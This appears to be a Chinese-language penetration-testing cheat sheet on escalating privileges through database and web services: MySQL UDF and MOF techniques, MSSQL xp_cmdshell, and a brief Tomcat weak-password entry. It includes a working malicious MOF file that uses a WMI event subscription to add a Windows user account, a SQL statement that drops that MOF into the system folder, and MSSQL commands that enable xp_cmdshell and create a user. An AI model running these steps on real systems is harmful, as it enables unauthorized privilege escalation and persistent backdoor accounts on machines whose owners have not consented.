内网提权-服务篇

服务提权

• mysql

  • UDF提权

    • 要求有写权限，并且未过滤单引号

    • windows

      • UDF导出到系统目录 C:/WINDOWS/SYSTEM32/

        MYSQL版本 < 5.1

      • UDF导出到安装路径 MYSQL\Lib\Plugin

        MYSQL版本 > 5.1

    • linux

      • /usr/lib/mysql/plugin

  • MOF提权

    • 只有windows

      • 步骤

        • 1.找个可写目录，将MOF文件上传
        • 2.执行以下sql语句，mof文件内命令便会执行
        • select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'
      • mofcomp.exe xxx.mof 执行mof文件
      • 调用lmofcompiler接口的$complieFile方法

      • pragma namespace(“\\.\root\subscription”)
        instance of __EventFilter as $EventFilter
        {
        EventNamespace = “Root\Cimv2”;
        Name = “filtP2”;
        Query = “Select * From __InstanceModificationEvent “
        “Where TargetInstance Isa ”Win32_LocalTime” “
        “And TargetInstance.Second = 5”;
        QueryLanguage = “WQL”;
        };
        instance of ActiveScriptEventConsumer as $Consumer
        {
        Name = “consPCSV2”;
        ScriptingEngine = “JScript”;
        ScriptText =
        “var WSH = new ActiveXObject(”WScript.Shell”)\nWSH.run(”net.exe user secist 123 /add”)“;
        };
        instance of __FilterToConsumerBinding
        {
        Consumer = $Consumer;
        Filter = $EventFilter;
        };

• mssql

  • xp_cmdshell

    • 开启：
      EXEC sp_configure 'show advanced options',1;
      RECONFIGURE;
      EXEC sp_configure 'xp_cmdshell',1;
      RECONFIGURE;
    • exec xp_cmdshell 'net user test test /add'
  • xp_regwrite

  • xp_regread

• tomcat

  • 弱口令